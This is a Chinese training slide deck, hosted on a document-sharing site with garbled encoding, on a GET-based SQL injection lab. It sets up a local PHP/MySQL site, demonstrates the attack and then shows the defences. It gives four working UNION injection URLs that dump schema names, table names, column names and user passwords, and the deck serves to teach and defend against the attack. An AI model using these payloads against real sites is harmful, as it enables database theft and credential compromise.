版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認(rèn)領(lǐng)
文檔簡介
數(shù)據(jù)庫暴庫—Get型注入攻擊主講人PPT時間20XX.XX目錄CONTENT01020304050607項目描述知識儲備創(chuàng)建數(shù)據(jù)庫建立Get方式查詢的網(wǎng)站數(shù)據(jù)庫暴庫攻擊測試Get型攻擊防護項目總結(jié)項目描述01Part通過本項目實訓(xùn),學(xué)員能夠解釋和分析Get型SQL注入漏洞對數(shù)據(jù)庫進行暴庫攻擊的原理及危害,并應(yīng)用參數(shù)化查詢功能實現(xiàn)Get型SQL注入攻擊的防護。01項目目標(biāo)任務(wù)一:建立數(shù)據(jù)庫用于信息查詢。任務(wù)二:開發(fā)基于Get型查詢功能的網(wǎng)站。任務(wù)三:利用Get型SQL注入實現(xiàn)數(shù)據(jù)庫暴庫。任務(wù)四:分析Get型SQL注入攻擊原理,提出并實現(xiàn)防護方法。項目任務(wù)01本項目幫助學(xué)員深入理解Get型SQL注入攻擊的原理和危害,掌握有效的防護方法,提升Web應(yīng)用的安全性。項目意義知識儲備02PartGet方式特點Get方式將表單數(shù)據(jù)以“變量=值”的形式附加到URL后,各變量間用“&”連接,只支持ASCII字符,非ASCII字符需URL編碼。特殊字符編碼特殊字符如空格(%20)、雙引號(%22)、井號(%23)、單引號(%27)等需編碼,避免引起歧義。URL編碼規(guī)則空格可替換為加號(+),正斜杠(/)分隔目錄,問號(?)分隔URL和查詢,百分號(%)用于特殊字符編碼。HTMLGet方式參數(shù)提交原理數(shù)據(jù)庫暴庫是通過SQL注入等漏洞獲取數(shù)據(jù)庫內(nèi)容的攻擊方式,Get型SQL注入常用于數(shù)據(jù)庫查詢操作,可實現(xiàn)暴庫。01暴庫定義UNION操作符用于合并多個SELECT語句的結(jié)果集,若存在SQL注入漏洞,可構(gòu)造UNION查詢語句實現(xiàn)暴庫。02UNION操作符數(shù)據(jù)庫暴庫的原理提交方式Get型通過URL提交數(shù)據(jù),Post型通過表單提交。發(fā)生場景Get型常發(fā)生在超鏈接傳遞參數(shù)時,Post型發(fā)生在頁面表單提交信息時。Get型和Post型SQL注入攻擊的區(qū)別創(chuàng)建數(shù)據(jù)庫03Part腳本內(nèi)容創(chuàng)建lab.sql腳本,定義數(shù)據(jù)庫lab和表books,插入兩條記錄,為后續(xù)查詢功能提供數(shù)據(jù)支持。0102腳本檢查數(shù)據(jù)庫是否存在,若不存在則創(chuàng)建;若存在表則刪除重建,確保表結(jié)構(gòu)和數(shù)據(jù)符合需求。腳本分析創(chuàng)建SQL腳本導(dǎo)入方法以管理員身份登錄MySQL,使用source命令導(dǎo)入lab.sql腳本,檢查導(dǎo)入是否成功。數(shù)據(jù)庫查詢驗證使用uselab;select*frombooks;查詢books表記錄,驗證數(shù)據(jù)是否正確導(dǎo)入,確保后續(xù)功能測試準(zhǔn)確。將腳本文件導(dǎo)入到數(shù)據(jù)庫sourceC:/Apache24/htdocs/get/lab.sql建立Get方式查詢的網(wǎng)站04Part創(chuàng)建index.php文件,使用Get方式接收參數(shù)id,查詢books表并顯示結(jié)果,實現(xiàn)基于Get的查詢功能。創(chuàng)建查詢頁面使用PHP/HTML混寫,通過include()函數(shù)引用數(shù)據(jù)庫連接文件,構(gòu)造SQL查詢語句并執(zhí)行,輸出查詢結(jié)果。代碼分析任務(wù)實現(xiàn)輸入不同id值,驗證查詢功能是否正常,檢查是否能正確顯示對應(yīng)記錄或報錯。查詢功能測試功能測試數(shù)據(jù)庫暴庫攻擊測試05Part攻擊方法在瀏覽器地址欄構(gòu)造SQL注入語句,利用UNION操作符查詢information_schema.schemata表,獲取所有數(shù)據(jù)庫名稱。攻擊結(jié)果查詢結(jié)果顯示在網(wǎng)頁的Book
name字段中,暴露出MySQL中所有數(shù)據(jù)庫名稱。暴數(shù)據(jù)庫http://localhost/get/index.php?id=-1%27union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--+攻擊方法構(gòu)造SQL注入語句,查詢information_schema.tables表,獲取lab數(shù)據(jù)庫的所有數(shù)據(jù)表名稱。攻擊結(jié)果查詢結(jié)果顯示在網(wǎng)頁的Bookname字段中,暴露出lab數(shù)據(jù)庫的所有數(shù)據(jù)表名稱。暴lab數(shù)據(jù)庫的數(shù)據(jù)表http://localhost/get/index.php?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27lab%27--+攻擊方法構(gòu)造SQL注入語句,查詢information_schema.columns表,獲取users表的所有列名稱。攻擊結(jié)果查詢結(jié)果顯示在網(wǎng)頁的Bookname字段中,暴露出users表的所有列名稱。暴users表的所有列http://localhost/get/index.php?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+構(gòu)造SQL注入語句,直接查詢users表的數(shù)據(jù),獲取用戶名和密碼等信息。查詢結(jié)果顯示在網(wǎng)頁的Book
name字段中,暴露出users表的第一條記錄的用戶名和密碼。攻擊方法攻擊結(jié)果暴users表的數(shù)據(jù)http://localhost/get/index.php?id=-1%27union%20select%201,username,passcode%20from%20users%20where%20id=1--+攻擊原理總結(jié)Get型SQL注入攻擊通過構(gòu)造惡意SQL語句,利用UNION操作符合并查詢結(jié)果,繞過正常查詢邏輯,獲取數(shù)據(jù)庫敏感信息。攻擊危害一旦網(wǎng)站存在Get型SQL注入漏洞,攻擊者可逐步獲取數(shù)據(jù)庫結(jié)構(gòu)和數(shù)據(jù),嚴(yán)重威脅網(wǎng)站和用戶信息安全。測試分析Get型攻擊防護06Part使用mysqli_escape_string()函數(shù)對用戶輸入進行轉(zhuǎn)義,防止特殊字符破壞SQL語句結(jié)構(gòu),但需注意寬字符繞過風(fēng)險。轉(zhuǎn)義函數(shù)應(yīng)用測試使用轉(zhuǎn)義函數(shù)后,Get型SQL注入攻擊是否失效,驗證其在SQL注入防護中的有效性。防護效果驗證使用PHP轉(zhuǎn)義函數(shù)使用MySQLi擴展實現(xiàn)參數(shù)化查詢,編寫index_mysqli.php文件,將用戶輸入作為參數(shù)綁定到SQL語句中,防止SQL注入攻擊。參數(shù)化查詢實現(xiàn)測試使用參數(shù)化查詢后,Get型SQL注入攻擊是否失效,驗證其在SQL注入防護中的有效性。防護效果驗證MySQLi參數(shù)化查詢$stmt->bind_param("i",$id);$stmt->execute();$result=$stmt->get_result();$row=$result->fetch_row();項目總結(jié)07Part本項目成功重現(xiàn)了Get型SQL注入漏洞,測試了多種攻擊方式,并實現(xiàn)了有效的防護方
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2026年及未來5年中國休閑游戲行業(yè)市場深度評估及投資戰(zhàn)略規(guī)劃報告
- 《GAT 2000.305-2022公安信息代碼 第305部分:資金交易設(shè)備類型代碼》專題研究報告深度
- 2026屆山東省淄博市第一學(xué)期高三摸底質(zhì)量檢測語文(期末)(含答案)
- 2026年上海城投信息技術(shù)主管面試題及答案解析
- 稅法自考試題及答案
- 數(shù)字電路試卷及答案
- 2026年數(shù)據(jù)庫管理員面試題集題目與解答
- 2026年測試工程師助理的考試大綱及題目解析
- 餐飲服務(wù)規(guī)范與食品安全操作手冊(標(biāo)準(zhǔn)版)
- 2025年品牌形象建設(shè)與維護指南
- 大數(shù)據(jù)安全技術(shù)與管理
- 2026年中小學(xué)校長校園安全管理培訓(xùn)考試題及答案
- 2025年山東建筑大學(xué)思想道德修養(yǎng)與法律基礎(chǔ)期末考試模擬題必考題
- 江西省贛州地區(qū)2023-2024學(xué)年七年級上學(xué)期期末英語試(含答案)
- 2025年香港滬江維多利亞筆試及答案
- 述職報告中醫(yī)
- 患者身份識別管理標(biāo)準(zhǔn)
- 松下Feeder維護保養(yǎng)教材
- 汽車融資貸款合同范本
- 水環(huán)境保護課程設(shè)計報告
評論
0/150
提交評論